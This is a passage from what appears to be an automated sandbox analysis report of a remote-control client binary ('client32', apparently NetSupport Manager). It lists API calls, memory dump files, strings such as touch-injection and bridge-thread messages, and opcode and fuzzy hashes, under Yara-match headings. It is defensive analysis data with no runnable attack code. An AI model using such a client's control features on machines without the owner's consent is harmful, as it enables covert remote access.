                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _strncmp$FileWrite
                                                                                  • String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16">&nbsp;</p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td>&nbsp;</td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
                                                                                  • API String ID: 1635020204-3154135529
                                                                                  • Opcode ID: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                  • Instruction ID: 3ad994666f9f4a7bc5965cb6aac6b353dc675ffe3b9ee49526350f7e9061b273
                                                                                  • Opcode Fuzzy Hash: 792e616861f9a4ae8c30573813f2543d714be5633bae0a01c5bd2a42a3bb713b
                                                                                  • Instruction Fuzzy Hash: D3318D75E0061AABDB00CF95CC45FDEB7B8FF49254F004259E825B7280E731A504CBB0
                                                                                  APIs
                                                                                  • GetWindowTextA.USER32(?,?,00000080), ref: 11027474
                                                                                  • GetClassNameA.USER32(?,?,00000080), ref: 1102749F
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 110274C8
                                                                                  • GetDlgItem.USER32(?,00000004), ref: 110274CF
                                                                                  • GetDlgItem.USER32(?,00000008), ref: 110274DA
                                                                                  • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 110274F6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Item$ClassMessageNamePostTextWindow
                                                                                  • String ID: #32770$Tapiexe
                                                                                  • API String ID: 3170390011-3313516769
                                                                                  • Opcode ID: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                  • Instruction ID: 1b12e394e200b75f11f599ec6ab4d64d4751b928bcc344eaa962945fc7b69462
                                                                                  • Opcode Fuzzy Hash: c0ef354846b222e435f384819da54f80d37799a52fb5b20f16ffd1bead33262d
                                                                                  • Instruction Fuzzy Hash: E721BB31E4022D6BEB20DA659D41FDEF7ACEF69709F4000A5F641A61C0DFF56A44CB90
                                                                                  APIs
                                                                                  • GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110233C2
                                                                                    • Part of subcall function 1101FFB0: wsprintfA.USER32 ref: 11020078
                                                                                  • SetDlgItemTextA.USER32(?,?,11195264), ref: 110233FD
                                                                                  • GetDlgItem.USER32(?,?), ref: 11023414
                                                                                  • SetFocus.USER32(00000000), ref: 11023417
                                                                                  • GetDlgItem.USER32(00000000,?), ref: 11023445
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 1102344A
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Item$Textwsprintf$EnableErrorExitFocusLastMessageProcessWindow
                                                                                  • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
                                                                                  • API String ID: 1605826578-1986719024
                                                                                  • Opcode ID: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                  • Instruction ID: 8db35bf72fe99370d3eedeccbec7b94c25a8ea314d3c8a10113fa065dea7662b
                                                                                  • Opcode Fuzzy Hash: f36cc34cc9a969abcf6566481c33c0cc2ea65c20e1744d3420329027fe5297bf
                                                                                  • Instruction Fuzzy Hash: F721BB79600718ABD724DBA1CC85FABF3BCEB84718F00445DF66697640CA74BC45CB64
                                                                                  APIs
                                                                                  • GetMenuItemCount.USER32(?), ref: 1114513D
                                                                                  • _memset.LIBCMT ref: 1114515E
                                                                                  • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1114519B
                                                                                  • CreatePopupMenu.USER32 ref: 111451AA
                                                                                  • GetMenuItemCount.USER32(?), ref: 111451D3
                                                                                  • InsertMenuItemA.USER32(?,00000000,00000001,00000030), ref: 111451E4
                                                                                  • GetMenuItemCount.USER32(?), ref: 111451EB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Menu$Item$Count$CreateInfoInsertPopup_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 74472576-4108050209
                                                                                  • Opcode ID: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                  • Instruction ID: c294618d83ba700a36b9fba62bf733376f49e09b6547452e6c31807948eb4840
                                                                                  • Opcode Fuzzy Hash: b25f34294336de4f8839e45289e2c114ec1c9262bee8a9cac9f6491c5d519ada
                                                                                  • Instruction Fuzzy Hash: 7A21AC7180022CABDB24DF50DC88BEEF7B8EB49719F0040A8E519A6540CBB45B84CFA0
                                                                                  APIs
                                                                                  • GetParent.USER32(?), ref: 11039768
                                                                                  • GetDlgItem.USER32(00000000,00000001), ref: 11039771
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 11039778
                                                                                  • PostMessageA.USER32(?,00000100,00000009,000F0001), ref: 110397A5
                                                                                  • GetParent.USER32(?), ref: 110397B6
                                                                                  • GetWindowRect.USER32(?,?), ref: 110397C3
                                                                                  • IntersectRect.USER32(?,?,?), ref: 110397FC
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 11039836
                                                                                  • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 11039855
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Parent$EnabledIntersectItemMessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 818519836-0
                                                                                  • Opcode ID: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                  • Instruction ID: 21b51dd7fe149e1a5d9ad7f830f962c89668f9ef243aefe38cead8d8046866f3
                                                                                  • Opcode Fuzzy Hash: 33344d5b3ab49040102bd7daff6fd58b1d3f5c5988b71863a939ad33b6b593f0
                                                                                  • Instruction Fuzzy Hash: D8419375A00219EFDB15CFA4CD84FEEB778FB88714F10456AF926A7684EB74A9008B50
                                                                                  APIs
                                                                                    • Part of subcall function 111103D0: GetCurrentThreadId.KERNEL32 ref: 111103DE
                                                                                    • Part of subcall function 111103D0: EnterCriticalSection.KERNEL32(00000000,76933760,00000000,111F1590,?,110CD955,00000000,76933760), ref: 111103E8
                                                                                    • Part of subcall function 111103D0: LeaveCriticalSection.KERNEL32(00000000,7694A1D0,00000000,?,110CD955,00000000,76933760), ref: 11110408
                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,76933760,00000000,7694A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                  • SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                  • SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                  • IsDialogMessageA.USER32(00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9BB
                                                                                  • LeaveCriticalSection.KERNEL32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9D1
                                                                                  • DestroyWindow.USER32(00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9E1
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9EB
                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CDA01
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalSection$Leave$Message$EnterSend$CurrentDestroyDialogThreadWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1497311044-0
                                                                                  • Opcode ID: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                  • Instruction ID: b02c8bb8fc4c5bab3a2fa1ad08f5b589118d407137368f819e71080725a4af13
                                                                                  • Opcode Fuzzy Hash: 2ca538d9d32515c3e592d89dbfe819c932d1486fc83d3c14ad79142d2062fd26
                                                                                  • Instruction Fuzzy Hash: 5521D636B41218ABE710DFA8E988BDEB7E9EB49755F0040E6F918D7640D771AD008BE0
                                                                                  APIs
                                                                                  • GetStockObject.GDI32(00000003), ref: 111135A7
                                                                                  • FillRect.USER32(?,?,00000000), ref: 111135C4
                                                                                  • FillRect.USER32(?,?,00000000), ref: 111135D2
                                                                                  • SetROP2.GDI32(?,00000007), ref: 111135FE
                                                                                  • SetBkMode.GDI32(?,?), ref: 1111360A
                                                                                  • SetBkColor.GDI32(?,?), ref: 11113615
                                                                                  • SetTextColor.GDI32(?,?), ref: 11113620
                                                                                  • SetTextJustification.GDI32(?,?,?), ref: 11113631
                                                                                  • SetTextCharacterExtra.GDI32(?,?), ref: 1111363D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3453225430.0000000011000000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453582705.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453654122.00000000111E2000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453691462.00000000111F1000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000111F7000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001125D000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.0000000011288000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001129E000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112AD000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112B4000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.00000000112DF000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 0000000B.00000002.3453736216.000000001132B000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Text$ColorFillRect$CharacterExtraJustificationModeObjectStock
                                                                                  • String ID:
                                                                                  • API String ID: 1094208222-0
                                                                                  • Opcode ID: 1cbc9ed1b46d6c71f90ef3a18c70e791402d54b145c2918b3fccb73878480588
                                                                                  • Instruction ID: 11fb3597ac11fe0070853bb1276331f7103533f07ae90b5f1526d6834acfdad0
                                                                                  • Instruction Fuzzy Hash: CE2148B1D01128AFDB04DFA4D988AFEB7B8EF48315F104169FD15AB208D7746A01CBA0
                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(00000000,11196940), ref: 1100D4D4
                                                                                  • GetProcAddress.KERNEL32(00000000,11196930), ref: 1100D4E8
                                                                                  • GetProcAddress.KERNEL32(00000000,11196920), ref: 1100D4FD
                                                                                  • GetProcAddress.KERNEL32(00000000,11196910), ref: 1100D511
                                                                                  • GetProcAddress.KERNEL32(00000000,11196904), ref: 1100D525
                                                                                  • GetProcAddress.KERNEL32(00000000,111968E4), ref: 1100D53A
                                                                                  • GetProcAddress.KERNEL32(00000000,111968C4), ref: 1100D54E
                                                                                  • GetProcAddress.KERNEL32(00000000,111968B4), ref: 1100D562
                                                                                  • GetProcAddress.KERNEL32(00000000,111968A4), ref: 1100D577
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc
                                                                                  • String ID:
                                                                                  • API String ID: 190572456-0
                                                                                  • Opcode ID: 48f9917a60cec6284becfcab2cdcd3c09a63cc3d8906f3dcaa48a20254382f18
                                                                                  • Instruction ID: 68c230a61e409724fd33842e5b4cb172798431ad54f26f9eb7569f07803db95b
                                                                                  • Instruction Fuzzy Hash: E3318CB19127349FEB16CBD8C8C9A79BBE9A758749F80453AD43083248E7B65844CF60
                                                                                  APIs
                                                                                    • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                  • _memset.LIBCMT ref: 110433A9
                                                                                  • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                                  • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                                  Strings
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MetricsSystem$__wcstoi64_memset
                                                                                  • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                                  • API String ID: 3760389471-710950153
                                                                                  • Opcode ID: 219f2807627d3fca353150cd103efd45732b91eedb346247534d9a6fde96576b
                                                                                  • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                                  • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                                  APIs
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F564
                                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 1101F5B8
                                                                                  • GetBkColor.GDI32(?), ref: 1101F5BE
                                                                                  • GetTextColor.GDI32(?), ref: 1101F645
                                                                                    • Part of subcall function 1101EF10: GetSysColor.USER32(00000011), ref: 1101EF58
                                                                                    • Part of subcall function 1101EF10: SetTextColor.GDI32(?,00000000), ref: 1101EF63
                                                                                    • Part of subcall function 1101EF10: SetBkColor.GDI32(?,?), ref: 1101EF81
                                                                                    • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F00D
                                                                                    • Part of subcall function 1101EF10: GetSystemMetrics.USER32(00000047), ref: 1101F018
                                                                                    • Part of subcall function 1101EF10: DrawTextA.USER32(?,?,?,?,00000024), ref: 1101F056
                                                                                    • Part of subcall function 1101EF10: SelectObject.GDI32(?,?), ref: 1101F064
                                                                                  Strings
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Color$Text$InflateObjectRectSelect$DrawMetricsSystem
                                                                                  • String ID: VUUU$VUUU
                                                                                  • API String ID: 179481525-3149182767
                                                                                  • Opcode ID: b696bc920655d17bf41ed58ebd1d76277304b1d90df833fe6010ba542b89aa38
                                                                                  • Instruction ID: daec56a1ae35cbc085cb1de7b5199678d62f5094ff6f4e18006982d33a32e855
                                                                                  • Instruction Fuzzy Hash: 7F617F75E0020A9BCB04CFA8D881AAEF7F5FB58324F14466AE415A7385DB74FA05CB94
                                                                                  APIs
                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 1103B476
                                                                                  • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 1103B49C
                                                                                  • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1103B4C2
                                                                                  Strings
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Directory$FolderPathSystemWindows
                                                                                  • String ID: "%PROG%$%SYS%$%WIN%$c:\program files
                                                                                  • API String ID: 1538031420-1992112792
                                                                                  • Opcode ID: ddd6d956b29487594e14033a5dfc4f519d1a9c99b2594e5049262a26b0e0d805
                                                                                  • Instruction ID: 2623f2ed80b282b5754acc89838a0d53b3ad1afe3f6d6f3bb9299b9b15bf7866
                                                                                  • Instruction Fuzzy Hash: 50412775E0461A5FCB15CE348C94BEAB7E9EF8930DF0041E8E899D7644EBB59944CB80
                                                                                  APIs
                                                                                    • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                    • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                    • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                  • InitializeCriticalSection.KERNEL32(0000000C), ref: 11061790
                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,11195264,00000000,0002001F,00000000,00000008,?,?,00000001,00000001), ref: 110617F5
                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,?,00000000,11195264,00000000,00020019,00000000,00000008,?), ref: 1106181C
                                                                                  • RegCreateKeyExA.ADVAPI32(00000000,ConfigList,00000000,11195264,00000000,0002001F,00000000,?,?), ref: 1106185B
                                                                                  • RegCreateKeyExA.ADVAPI32(?,ConfigList,00000000,11195264,00000000,00020019,00000000,?,?), ref: 1106188F
                                                                                  Strings
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalInitializeSection_malloc_memsetwsprintf
                                                                                  • String ID: ConfigList$PCICTL
                                                                                  • API String ID: 4014706405-1939909508
                                                                                  • Opcode ID: cae4a2d1f4de0a4020005886155d60d9723e04be6fdd3d8070ab79db40d2f8ad
                                                                                  • Instruction ID: f687ffc68a66fe95333fcb084f814ecf12f43e5332dda5a21faccb30f4540590
                                                                                  • Instruction Fuzzy Hash: 205130B5A40319AFE710CF65CC85FAABBF8FB84B54F10851AF929DB280D774A504CB50
                                                                                  APIs
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110276B3
                                                                                  • TranslateMessage.USER32(?), ref: 110276E1
                                                                                  • DispatchMessageA.USER32(?), ref: 110276EB
                                                                                  • Sleep.KERNEL32(000003E8), ref: 11027774
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110277DA
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchSleepTranslate
                                                                                  • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                  • API String ID: 3237117195-3850961587
                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                                  • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                                  • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                    • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                    • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                    • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                    • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                  • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                  • API String ID: 1092798621-1973987134
                                                                                  APIs
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4AD
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4D0
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 1100F554
                                                                                  • __CxxThrowException@8.LIBCMT ref: 1100F562
                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1100F575
                                                                                  • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F58F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3453290895.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                                  Similarity
                                                                                  • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                  • String ID: bad cast
                                                                                  • API String ID: 2427920155-3145022300
                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(0000025C,000003E8), ref: 1113572F
                                                                                  • GetTickCount.KERNEL32 ref: 1113578C
                                                                                    • Part of subcall function 111449B0: GetTickCount.KERNEL32 ref: 11144A18
                                                                                  • wsprintfA.USER32 ref: 111357BC
                                                                                    • Part of subcall function 110B86C0: ExitProcess.KERNEL32 ref: 110B8702
                                                                                  • WaitForSingleObject.KERNEL32(0000025C,000003E8), ref: 11135802
                                                                                  Strings
